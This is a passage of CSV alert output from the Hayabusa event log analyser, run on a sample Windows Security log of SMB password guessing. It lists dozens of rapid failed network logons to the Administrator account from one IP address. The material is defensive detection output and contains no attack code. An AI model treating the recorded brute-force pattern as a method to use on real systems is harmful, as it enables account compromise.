NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbtC0srNyvkIHOSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPGlJ6ZjGSfUKrCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Uw95Ema8vWlRXKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hHTrBmhkjGLTNt2R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJeRVGKULJIo76aa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kipf0Z2Tse2eWoxa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnP7tmMJXDVzIDim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CBeMt62oqlIICShT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIfXRZQkKRJAw4er : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wrqSJPALo5QtUnS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81Mm67AdwpPJMCMm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jwq5jXlMRU1SNLO5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d7OYj8ynCEl5dG9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YzT8vF7ANYnjSRgd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4eYIoww4uL6oYZu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DpO8L2Fky4zYwp2q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGmxSy48sphENTiY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tQVAkjteLFK0hbyE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMWKsQ8l0j9fZPfA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ct7xYUYH9sr7mva : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBn0XxaPOZQokJ0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nQELRxrGuXqkYgO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5eT0mykgLNZQygq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qMyIqRidF6oBdzog : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ULnnFcF98k9zpNTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j5k02pcelZNGwF3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qfcC6LqJqs0EeGjE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXALYkkitmyAFq14 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIqQmExq22WrW4md : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ydHqjdZhLMI9gjfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSe45VZNPdovPbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hiHlcR6qNGE0P7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iT3jPdHr89RqPlyd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0QFnABeYK39XEntR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5plMYSBQi5mKmdlk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TaxWckQUCMgWvCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81xZ7iisEyTABmUm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qYiQ2xjMQFQwH2XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRN8e3yzZzxc2p3A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCa6PN0C7XznvipG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hFqjIXbEb7eWUFUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkrVjLgnJZlIyXpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2r5tyuIYijAXN5be : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AgjQNe9hQrLIETDn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNoInpFTsixZDIu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ladJUS6I0HMIwdef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oW63pJlVtjgn3YY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKNu8b2To2Y1twUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9sN5xm3GytfmM7G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtQQS61GYBm6WUUz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WxxawZZMhNCGHxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sKP8G2VgJlrr9LMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvOsNQpk3c5p1FgK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7oz7NPh5Z8UrDPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvzNFOLBlBv98Do4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KJmYytO30Icc6Rb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zro3jLjFXWZ2o8VL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Z2J8VYeuxd9fKcG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXMjOKLfMex7OmMv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgbm3YeoGxCa22Il : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7MEstBFjiWhVE18 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8Y2kDEiMZWf0znn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBAFVgPIOyCvtdRs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s3pFhUcspF6lzQXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39LFXXW715pQoADC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: in4ewyxouUnxQzCQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOtV8CLIU6Mcw2ty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8NJqimhGrg9uhTh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XEWLTOY9magV0h6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Di1MZsJx52Bi8E6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22MdB2QodynfibkF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qojej3YITXvXJ6Pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CLjbQ6timbdQoufd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aZgoAnGEFwXN88bQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZFWoL9XUMJdfNnY : IP Address: 192.168.198.149 : AuthPackage: 